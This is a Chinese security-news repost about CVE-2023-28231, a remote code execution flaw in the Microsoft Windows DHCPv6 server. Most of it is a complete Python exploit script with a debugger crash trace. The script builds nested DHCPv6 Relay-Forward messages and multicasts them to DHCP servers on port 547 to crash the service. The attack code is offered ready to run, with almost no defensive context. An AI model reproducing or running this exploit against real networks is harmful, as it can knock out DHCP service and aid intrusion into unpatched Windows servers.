DHCP 服务器远程代码执行漏洞,影响范围:从 2008 R2 SP1 到 Server 2019

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/glavstroy/CVE-2023-28231

CVE-2023-28231

DHCP服务器远程代码执行 影响范围:从 2008 R2 SP1 到 Server 2019

EXP

win_dhcp_exploit.py

"""
Microsoft DHCPv6 Server - RelayForward
@w3bd3vil
0:024> r
rax=00000000ffff000c rbx=00000000000001a2 rcx=00000033ffcc0270
rdx=0000000000000000 rsi=00000000000001a2 rdi=00000138fba4c098
rip=00007ffa177aecc6 rsp=0000003179dffd00 rbp=0000000000000012
 r8=0000000000000020  r9=0000000000000000 r10=0000000000000004
r11=0000000000000246 r12=000000000000059c r13=0000000000000002
r14=00000138fba4d48c r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
dhcpssvc!ProcessRelayForwardMessage+0x346:
00007ffa`177aecc6 4c398c396a060000 cmp     qword ptr [rcx+rdi+66Ah],r9 ds:0000016c`fb70c972=????????????????
0:024> k
 # Child-SP          RetAddr               Call Site
00 00000031`79dffd00 00007ffa`177ae4a3     dhcpssvc!ProcessRelayForwardMessage+0x346
01 00000031`79dffda0 00007ffa`177b16e7     dhcpssvc!DhcpV6ProcessMessage+0x187
02 00000031`79dffe00 00007ffa`1779cbd5     dhcpssvc!DhcpV6ProcessPacket+0x77
03 00000031`79dffe50 00007ffa`24c94de0     dhcpssvc!ProcessingLoop+0x1c5
04 00000031`79dffeb0 00007ffa`25cfe3db     KERNEL32!BaseThreadInitThunk+0x10
05 00000031`79dffee0 00000000`00000000     ntdll!RtlUserThreadStart+0x2b
https://www.zerodayinitiative.com/blog/2023/5/1/cve-2023-28231-rce-in-the-microsoft-windows-dhcpv6-service
"""
import socket

s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.bind(('2001:db8::f0c0:c671:3b26:e213', 547)) #LHOST
dest_addr = ('ff02::1:2', 547)

final_packet =  b'\x0c' #Relay-forw
# dhcpssvc!ProcessRelayForwardMessage+0x103:
# 00007ffa`177aea83 807d0120        cmp     byte ptr [rbp+1],20h ss:00000138`fba49ef1=21
final_packet += b'\x20'
final_packet += b'\x00'*16 #link-address
final_packet += b'\x00'*16 #peer-address

arre_packet = []
length_value = 0
for i in range(40):
    if i == 0:
        length_value += 40 + 4 + 56
    else:
        length_value += 40 + 4
    hex_length_value = length_value.to_bytes(2, 'big')

    # dhcpssvc!ProcessRelayForwardMessage+0x268:
    # 00007ffa`177aebe8 0f859c010000    jne     dhcpssvc!ProcessRelayForwardMessage+0x40a (00007ffa`177aed8a) [br=0]
    if i <= 8:
        hop_value = 0
    else:
        hop_value = i - 8
    hop_value = hop_value.to_bytes(1, 'big')

    packet =  b''
    packet += b'\x00\x09' #Relay Message
    packet += hex_length_value
    packet += b'\x0c' #Relay-forw
    packet += hop_value
    packet += b'\xff'*16 #link-address
    packet += b'\xff'*16 #peer-address
    packet += b'\x00\x12\x00\x02\x51\x80' #interface-id (probably not required)

    if i == 0:
        packet += b'\x00\x09' #Relay Message
        packet += b'\x00\x38' #Length
        packet += b'\x01\x91\xf7\xd9\x00\x01\x00\x0e\x00\x01\x00\x01\x2b\xe6\xb0\xc7\x56\x1f\xf0\x8f\x03\x85\x00\x06\x00' #SOLICIT
        packet += b'\x08\x00\x17\x00\x18\x00\x27\x00\x1f\x00\x08\x00\x02\x00\x00\x00\x03\x00\x0c\x5d\x0b\xdd\x07\x00\x00' #SOLICIT
        packet += b'\x0e\x10\x00\x00\x15\x18' #SOLICIT

    #print(packet.hex())
    arre_packet.append(packet)

#print(b''.join(arre_packet[::-1]).hex())
final_packet += b''.join(arre_packet[::-1])

s.sendto(final_packet, dest_addr)
print(f"Krash packet sent!")
s.close()

 
